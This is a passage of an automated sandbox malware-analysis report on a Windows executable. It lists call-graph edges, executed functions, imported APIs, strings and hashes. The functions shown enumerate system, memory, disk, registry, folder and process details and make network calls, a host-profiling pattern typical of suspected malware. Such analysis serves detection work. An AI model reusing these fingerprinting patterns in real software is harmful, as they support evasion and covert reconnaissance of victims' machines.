57926->57909 57926->57911 57926->57925 57989 5c4fd0 _open 57926->57989 57928 5badb7 57927->57928 57983 5c4fd0 _open 57927->57983 57984 5d3030 _open 57928->57984 57929 5bad01 57986 5c4f40 _open 57929->57986 57934 5ba15f 57933->57934 57943 5b8c4d 57933->57943 57935 5ba181 getsockname 57934->57935 57934->57943 57936 5ba1d0 57935->57936 57937 5ba1f7 57935->57937 57996 59d090 _open 57936->57996 57938 5bef30 _open 57937->57938 57942 5ba20f 57938->57942 57940 5ba1eb 57998 5c4f40 _open 57940->57998 57942->57943 57997 59d090 _open 57942->57997 57943->57866 57946 5c50a0 _open 57943->57946 57945->57851 57946->57866 57947->57845 57948->57874 57949->57870 57950->57859 57951->57858 57953 5878c5 57952->57953 57955 5878d7 57952->57955 57999 5872a0 _open 57953->57999 57955->57845 57957 5875ef 57956->57957 57958 587607 socket 57956->57958 57957->57958 57961 587601 57957->57961 57962 587643 57957->57962 57959 58762b 57958->57959 57960 58763a 57958->57960 57992 5872a0 _open 57959->57992 57960->57879 57961->57958 57993 5872a0 _open 57962->57993 57965 587654 57994 58cb20 _open 57965->57994 57967 587674 57967->57879 57969 5befa8 57968->57969 57970 5bef47 57968->57970 57969->57970 57995 58c960 _open 57969->57995 57970->57885 57972->57899 57973->57894 57974->57925 57975->57880 57976->57882 57977->57886 57978->57902 57979->57893 57980->57906 57981->57929 57982->57913 57983->57928 57984->57926 57985->57929 57986->57925 57987->57910 57988->57916 57989->57926 57990->57920 57991->57925 57992->57960 57993->57965 57994->57967 57995->57970 57996->57940 57997->57940 57998->57943 57999->57955 58270 5b95b0 58271 5b95c8 58270->58271 58273 5b95fd 58270->58273 58272 5ba150 2 API calls 58271->58272 58271->58273 58272->58273 58000 582f17 58008 582f2c 58000->58008 58001 5831d3 58002 582fb3 RegOpenKeyExA 58002->58008 58003 58315c RegEnumKeyExA 58004 5831b2 RegCloseKey 58003->58004 58003->58008 58004->58008 58005 583046 RegOpenKeyExA 58006 583089 RegQueryValueExA 58005->58006 58005->58008 58007 58313b RegCloseKey 58006->58007 58006->58008 58007->58008 58008->58001 58008->58002 58008->58003 58008->58005 58008->58007 58009 5831d7 58012 5831f4 58009->58012 58010 583200 58011 5832dc CloseHandle 58011->58010 58012->58010 58012->58011 58013 5813c9 58015 581160 58013->58015 58016 5813a1 58015->58016 58017 908a20 10 API calls 58015->58017 58017->58015 58018 a4fa30 58019 a4fa5a 58018->58019 58020 a4fa66 58019->58020 58021 908f70 _open 58019->58021 58022 a4fa6f 58021->58022 58034 9112c0 58022->58034 58025 a4faa6 58026 908f70 _open 58027 a4faaf 58026->58027 58028 a4fb50 58027->58028 58032 a4fb06 58027->58032 58038 90b500 _lock 58028->58038 58030 a4fb44 58031 a4fb79 58032->58030 58039 90b500 _lock 58032->58039 58035 9112cc 58034->58035 58040 90e050 58035->58040 58037 9112fa 58037->58025 58037->58026 58038->58031 58039->58031 58046 90e09d 58040->58046 58050 90e503 58040->58050 58041 90e18e 58042 90ed90 ungetc 58041->58042 58045 90e1a6 58041->58045 58042->58045 58043 910250 ungetc 58043->58050 58044 9111a4 ungetc 58044->58050 58045->58037 58046->58041 58046->58045 58049 90e388 58046->58049 58046->58050 58051 90e243 58046->58051 58047 910742 ungetc 58047->58045 58048 9108d7 ungetc 58048->58050 58049->58045 58049->58050 58054 9100b8 ungetc 58049->58054 58050->58043 58050->58044 58050->58045 58050->58048 58050->58051 58052 910006 ungetc 58050->58052 58053 910e3e ungetc 58050->58053 58051->58045 58051->58047 58052->58050 58053->58050 58054->58049 58274 59d5e0 58275 59d5f0 58274->58275 58276 59d652 WSAStartup 58274->58276 58279 59d67c 58275->58279 58281 59d690 _open 58275->58281 58276->58275 58277 59d664 58276->58277 58280 59d5fa 58281->58280 58055 5bb400 58056 5bb40b 58055->58056 58057 5bb425 58055->58057 58060 587770 58056->58060 58058 5bb421 58061 587790 58060->58061 58062 5877b6 recv 58060->58062 58061->58062 58063 587799 58061->58063 58066 5877d4 58062->58066 58068 5877a3 58062->58068 58064 5877db 58063->58064 58063->58068 58072 5872a0 _open 58064->58072 58066->58058 58071 5872a0 _open 58068->58071 58069 5877ec 58073 58cb20 _open 58069->58073 58071->58066 58072->58069 58073->58066 58074 5be400 58075 5be412 58074->58075 58082 5be459 58074->58082 58080 5be422 58075->58080 58098 5d3030 _open 58075->58098 58078 5be42b 58100 5b68b0 closesocket _open 58078->58100 58079 5be4a8 58099 5e09d0 _open 58080->58099 58082->58079 58083 5be495 58082->58083 58086 5bb5a0 58082->58086 58083->58079 58085 5bb5a0 _open 58083->58085 58085->58079 58087 5bb5d2 58086->58087 58088 5bb5c0 58086->58088 58087->58083 58088->58087 58089 5bb713 58088->58089 58092 5bb626 58088->58092 58102 5c4f40 _open 58089->58102 58091 5bb65a 58091->58087 58093 5bb72b 58091->58093 58094 5bb737 58091->58094 58092->58087 58092->58091 58092->58093 58092->58094 58101 5c50a0 _open 58092->58101 58093->58087 58103 5c50a0 _open 58093->58103 58094->58087 58104 5c50a0 _open 58094->58104 58098->58080 58099->58078 58100->58082 58101->58092 58102->58087 58103->58087 58104->58087 58105 5bf100 58107 5bf11f 58105->58107 58131 5bf1b8 58105->58131 58106 5bff1a 58150 5c0c80 _open 58106->58150 58109 5bf2a3 58107->58109 58123 5bf240 58107->58123 58126 5bf5b9 58107->58126 58107->58131 58137 5c4f40 _open 58109->58137 58111 5c0045 58114 5c010d 58111->58114 58117 5c004d 58111->58117 58111->58131 58153 5c50a0 _open 58111->58153 58112 5bf80d 58116 5c015e 58114->58116 58154 5c50a0 _open 58114->58154 58115 5c008a 58152 5c4f40 _open 58115->58152 58116->58117 58155 5c50a0 _open 58116->58155 58156 5c4f40 _open 58117->58156 58123->58131 58138 587310 58123->58138 58125 5bf491 58125->58126 58129 587310 _open 58125->58129 58126->58106 58126->58111 58126->58112 58126->58115 58132 5c0d30 _open 58126->58132 58133 5c50a0 _open 58126->58133 58149 5c4fd0 _open 58126->58149 58127 5bff5b 58127->58131 58151 5c50a0 _open 58127->58151 58135 5bf50d 58129->58135 58130 5bf3ce 58130->58125 58130->58131 58147 5c50a0 _open 58130->58147 58132->58126 58133->58126 58135->58126 58135->58131 58148 5c50a0 _open 58135->58148 58137->58131 58139 587320 58138->58139 58142 587332 58138->58142 58140 587390 58139->58140 58139->58142 58158 5872a0 _open 58140->58158 58146 587380 58142->58146 58157 5872a0 _open 58142->58157 58143 5873a1 58159 58cb20 _open 58143->58159 58146->58130 58147->58125 58148->58126 58149->58126 58150->58127 58151->58131 58152->58131 58153->58114 58154->58116 58155->58117 58156->58131 58157->58146 58158->58143 58159->58146 58160 5bb3c0 58161 5bb3cb 58160->58161 58162 5bb3ee 58160->58162 58164 5876a0 2 API calls 58161->58164 58166 5b9290 58161->58166 58163 5bb3ea 58164->58163 58167 5876a0 2 API calls 58166->58167 58168 5b92e5 58167->58168 58169 5b93c3 58168->58169 58171 5b92f3 58168->58171 58173 5b9392 58169->58173 58180 59d090 _open 58169->58180 58170 5b93be 58170->58163 58171->58173 58176 5b9335 WSAIoctl 58171->58176 58173->58170 58182 5c50a0 _open 58173->58182 58174 5b93f7 58181 5c4f40 _open 58174->58181 58176->58173 58178 5b9366 58176->58178 58178->58173 58179 5b9371 setsockopt 58178->58179 58179->58173 58180->58174 58181->58173 58182->58170 58183 5c0700 58184 5c099d 58183->58184 58185 5c0719 58183->58185 58185->58184 58187 587310 _open 58185->58187 58188 5c09b5 58185->58188 58189 5c09f6 58185->58189 58192 5c0a35 58185->58192 58200 5bb8e0 _open 58185->58200 58201 5ef570 _open 58185->58201 58202 5aeb30 _open 58185->58202 58203 5e13a0 _open 58185->58203 58204 5aeae0 _open 58185->58204 58187->58185 58188->58184 58205 5c50a0 _open 58188->58205 58206 5875a0 58189->58206 58210 5c4f40 _open 58192->58210 58198 5875a0 _open 58198->58184 58200->58185 58201->58185 58202->58185 58203->58185 58204->58185 58205->58184 58207 5875aa 58206->58207 58208 5875d1 58206->58208 58207->58208 58211 5872a0 _open 58207->58211 58208->58198 58210->58184 58211->58208

                                      Executed Functions

                                      Function 005BF100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                      • API String ID: 0-1590685507
                                      • Opcode ID: a3438837f4714536e5724e5384ed37833d22e402ab36b3184e273b0a2799e500
                                      • Instruction ID: e23b4bd28bdcec606094370b93c3bf33bb179a82892d43563b650a3868a5d670
                                      • Opcode Fuzzy Hash: a3438837f4714536e5724e5384ed37833d22e402ab36b3184e273b0a2799e500
                                      • Instruction Fuzzy Hash: 3BC29231A043459FD714CF29C985BAABBE1BF84314F05CA6DEC989B262D771ED84CB81
                                      Function 0058255D Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 282fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetSystemInfo.KERNELBASE ref: 00582579
                                      • GlobalMemoryStatusEx.KERNELBASE ref: 005825CC
                                      • GetDriveTypeA.KERNELBASE ref: 00582647
                                      • GetDiskFreeSpaceExA.KERNELBASE ref: 0058267E
                                      • KiUserCallbackDispatcher.NTDLL ref: 005827E2
                                      • SHGetKnownFolderPath.SHELL32 ref: 0058286D
                                      • FindFirstFileW.KERNELBASE ref: 005828F8
                                      • FindNextFileW.KERNELBASE ref: 0058291F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: FileFind$CallbackDiskDispatcherDriveFirstFolderFreeGlobalInfoKnownMemoryNextPathSpaceStatusSystemTypeUser
                                      • String ID: ;%X$@$`
                                      • API String ID: 2066228396-1925365209
                                      • Opcode ID: af25ec571cfb6bd6d9a41d8cbd1f9ec8b61916b982f251a34b12abe310b051e1
                                      • Instruction ID: f2beaaa0719cd67839736bd419d6b3b67424c4846eaf0b5af7ee946316dd9d5a
                                      • Opcode Fuzzy Hash: af25ec571cfb6bd6d9a41d8cbd1f9ec8b61916b982f251a34b12abe310b051e1
                                      • Instruction Fuzzy Hash: 84D193B49053099FCB10EF68C5857AEBBF0BF48344F008969E898D7351E7359A84CF92
                                      Function 005829FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321registryfileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1362 5829ff-582a2f FindFirstFileA 1363 582a38 1362->1363 1364 582a31-582a36 1362->1364 1365 582a3d-582a91 call a51e50 call a51ee0 RegOpenKeyExA 1363->1365 1364->1365 1370 582a9a 1365->1370 1371 582a93-582a98 1365->1371 1372 582a9f-582b0c call a51e50 call a51ee0 CharUpperA call 908da0 1370->1372 1371->1372 1380 582b0e-582b13 1372->1380 1381 582b15 1372->1381 1382 582b1a-582b92 call a51e50 call a51ee0 call 908e80 call 908e70 1380->1382 1381->1382 1391 582bcc-582c66 QueryFullProcessImageNameA CloseHandle call 908da0 1382->1391 1392 582b94-582ba3 1382->1392 1402 582c68-582c6d 1391->1402 1403 582c6f 1391->1403 1395 582bb0-582bca call 908e68 1392->1395 1396 582ba5-582bae 1392->1396 1395->1391 1395->1392 1396->1391 1404 582c74-582ce9 call a51e50 call a51ee0 call 908e80 call 908e70 1402->1404 1403->1404 1413 582dcf-582e1c call a51e50 call a51ee0 CloseHandle 1404->1413 1414 582cef-582d49 call 908bb0 call 908da0 1404->1414 1424 582e23-582e2e 1413->1424 1425 582d99-582dad 1414->1425 1426 582d4b-582d63 call 908da0 1414->1426 1427 582e30-582e35 1424->1427 1428 582e37 1424->1428 1425->1413 1426->1425 1434 582d65-582d7d call 908da0 1426->1434 1430 582e3c-582ed6 call a51e50 call a51ee0 1427->1430 1428->1430 1443 582ed8-582ee1 1430->1443 1444 582eea 1430->1444 1434->1425 1440 582d7f-582d97 call 908da0 1434->1440 1440->1425 1448 582daf-582dc9 call 908e68 1440->1448 1443->1444 1446 582ee3-582ee8 1443->1446 1447 582eef-582f16 call a51e50 call a51ee0 1444->1447 1446->1447 1448->1413 1448->1414
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                      • String ID: 0
                                      • API String ID: 2406880114-4108050209
                                      • Opcode ID: bf3194938e7de7c79ecd13adb9defc261bd122a15f801c5bf3dbd4f1e1b848c4
                                      • Instruction ID: 71d368680755e0bc1810677866ae39f3dfad47c3ce47865d755de18af41a9b09
                                      • Opcode Fuzzy Hash: bf3194938e7de7c79ecd13adb9defc261bd122a15f801c5bf3dbd4f1e1b848c4
                                      • Instruction Fuzzy Hash: 46E1C4B49053059FCB10EF68DA857AEBBF5BF54344F0088A9E898E7350E774D9898F42
                                      Function 005905B0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 377networkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1507 5905b0-5905b7 1508 5905bd-5905d4 1507->1508 1509 5907ee 1507->1509 1510 5905da-5905e6 1508->1510 1511 5907e7-5907ed 1508->1511 1510->1511 1512 5905ec-5905f0 1510->1512 1511->1509 1513 5907c7-5907cc 1512->1513 1514 5905f6-590620 call 597350 call 5870b0 1512->1514 1513->1511 1519 59066a-59068c call 5bdec0 1514->1519 1520 590622-590624 1514->1520 1526 590692-5906a0 1519->1526 1527 5907d6-5907e3 call 597380 1519->1527 1522 590630-590655 call 5870d0 call 5903c0 call 597450 1520->1522 1547 59065b-590668 call 5870e0 1522->1547 1548 5907ce 1522->1548 1530 5906a2-5906a4 1526->1530 1531 5906f4-5906f6 1526->1531 1527->1511 1536 5906b0-5906e4 call 5973b0 1530->1536 1533 5906fc-5906fe 1531->1533 1534 5907ef-59082b call 593000 1531->1534 1538 59072c-590754 1533->1538 1551 590a2f-590a35 1534->1551 1552 590831-590837 1534->1552 1536->1527 1546 5906ea-5906ee 1536->1546 1542 59075f-59078b 1538->1542 1543 590756-59075b 1538->1543 1564 590791-590796 1542->1564 1565 590700-590703 1542->1565 1549 59075d 1543->1549 1550 590707-590719 WSAEventSelect 1543->1550 1546->1536 1553 5906f0 1546->1553 1547->1519 1547->1522 1548->1527 1558 590723-590726 1549->1558 1550->1527 1557 59071f 1550->1557 1554 590a3c-590a52 1551->1554 1555 590a37-590a3a 1551->1555 1560 590839-590842 call 596fa0 1552->1560 1561 590861-59087e 1552->1561 1553->1531 1554->1527 1562 590a58-590a81 call 592f10 1554->1562 1555->1554 1557->1558 1558->1534 1558->1538 1570 590847-59084c 1560->1570 1574 590882-59088d 1561->1574 1562->1527 1580 590a87-590a97 call 596df0 1562->1580 1564->1565 1569 59079c-5907c2 call 5876a0 1564->1569 1565->1550 1569->1565 1572 590a9c-590aa4 1570->1572 1573 590852 1570->1573 1572->1527 1573->1561 1577 590854-59085f 1573->1577 1578 590970-590975 1574->1578 1579 590893-5908b1 1574->1579 1577->1574 1581 590a19-590a2c 1578->1581 1582 59097b-590989 call 5870b0 1578->1582 1583 5908c8-5908f7 1579->1583 1580->1527 1581->1551 1582->1581 1590 59098f-59099e 1582->1590 1591 5908f9-5908fb 1583->1591 1592 5908fd-590925 1583->1592 1593 5909b0-5909c1 call 5870d0 1590->1593 1594 590928-59093f 1591->1594 1592->1594 1600 5909a0-5909ae call 5870e0 1593->1600 1601 5909c3-5909c7 1593->1601 1598 5908b3-5908c2 1594->1598 1599 590945-59096b 1594->1599 1598->1578 1598->1583 1599->1598 1600->1581 1600->1593 1603 5909e8-590a03 WSAEnumNetworkEvents 1601->1603 1605 5909d0-5909e6 WSAEventSelect 1603->1605 1606 590a05-590a17 1603->1606 1605->1600 1605->1603 1606->1605
                                      APIs
                                      • WSAEventSelect.WS2_32(?,?,?), ref: 00590711
                                      • WSAEventSelect.WS2_32(?,?,00000000), ref: 005909DD
                                      • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 005909FB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: EventSelect$EnumEventsNetwork
                                      • String ID: N=X$multi.c
                                      • API String ID: 2170980988-1470746878
                                      • Opcode ID: 65bc1150e706c17981bb5b67deef99e54bde20ac00d19e55e64d4c1d44d7dd7d
                                      • Instruction ID: b4574019a35732da687ea4a505cf248dc8e928d1ee89d269bb825bd2c6de0655
                                      • Opcode Fuzzy Hash: 65bc1150e706c17981bb5b67deef99e54bde20ac00d19e55e64d4c1d44d7dd7d
                                      • Instruction Fuzzy Hash: 52D1CF716083069FEB10DF64C885BABBBE9FF84354F045C2CF89492292E774E945DB92
                                      Function 0064B180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1678 64b180-64b195 1679 64b3e0-64b3e7 1678->1679 1680 64b19b-64b1a2 1678->1680 1681 64b1b0-64b1b9 1680->1681 1681->1681 1682 64b1bb-64b1bd 1681->1682 1682->1679 1683 64b1c3-64b1d0 1682->1683 1685 64b1d6-64b1f2 1683->1685 1686 64b3db 1683->1686 1687 64b229-64b22d 1685->1687 1686->1679 1688 64b233-64b246 1687->1688 1689 64b3e8-64b417 1687->1689 1690 64b260-64b264 1688->1690 1691 64b248-64b24b 1688->1691 1697 64b582-64b589 1689->1697 1698 64b41d-64b429 1689->1698 1695 64b269-64b286 call 64af30 1690->1695 1692 64b215-64b223 1691->1692 1693 64b24d-64b256 1691->1693 1692->1687 1696 64b315-64b33c call 908b00 1692->1696 1693->1695 1707 64b2f0-64b301 1695->1707 1708 64b288-64b2a3 call 64b060 1695->1708 1710 64b342-64b347 1696->1710 1711 64b3bf-64b3ca 1696->1711 1701 64b435-64b44c call 64b590 1698->1701 1702 64b42b-64b433 call 64b590 1698->1702 1715 64b44e-64b456 call 64b590 1701->1715 1716 64b458-64b471 call 64b590 1701->1716 1702->1701 1707->1692 1726 64b307-64b310 1707->1726 1722 64b200-64b213 call 64b020 1708->1722 1723 64b2a9-64b2c7 getsockname call 64b020 1708->1723 1719 64b384-64b38f 1710->1719 1720 64b349-64b358 1710->1720 1717 64b3cc-64b3d9 1711->1717 1715->1716 1736 64b473-64b487 1716->1736 1737 64b48c-64b4a7 1716->1737 1717->1679 1719->1711 1721 64b391-64b3a5 1719->1721 1727 64b360-64b382 1720->1727 1728 64b3b0-64b3bd 1721->1728 1722->1692 1734 64b2cc-64b2dd 1723->1734 1726->1717 1727->1719 1727->1727 1728->1711 1728->1728 1734->1692 1738 64b2e3 1734->1738 1736->1697 1739 64b4b3-64b4cb call 64b660 1737->1739 1740 64b4a9-64b4b1 call 64b660 1737->1740 1738->1726 1745 64b4cd-64b4d5 call 64b660 1739->1745 1746 64b4d9-64b4f5 call 64b660 1739->1746 1740->1739 1745->1746 1751 64b4f7-64b50b 1746->1751 1752 64b50d-64b52b call 64b770 * 2 1746->1752 1751->1697 1752->1697 1757 64b52d-64b531 1752->1757 1758 64b580 1757->1758 1759 64b533-64b53b 1757->1759 1758->1697 1760 64b53d-64b547 1759->1760 1761 64b578-64b57e 1759->1761 1760->1761 1762 64b549-64b54d 1760->1762 1761->1697 1762->1761 1763 64b54f-64b558 1762->1763 1763->1761 1764 64b55a-64b576 call 64b870 * 2 1763->1764 1764->1697 1764->1761
                                      APIs
                                      • getsockname.WS2_32(-00000020,-00000020,?), ref: 0064B2B7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: getsockname
                                      • String ID: ares__sortaddrinfo.c$cur != NULL
                                      • API String ID: 3358416759-2430778319
                                      • Opcode ID: 333d0699e6f1facb5f5b66d8a1b24b16b82511f0840154b1e1f9092cd4caf1d6
                                      • Instruction ID: a1b9fe26392e0c98c4b0dc1796c5f10f779d177932223d2d7bf9ac6ad9903fdd
                                      • Opcode Fuzzy Hash: 333d0699e6f1facb5f5b66d8a1b24b16b82511f0840154b1e1f9092cd4caf1d6
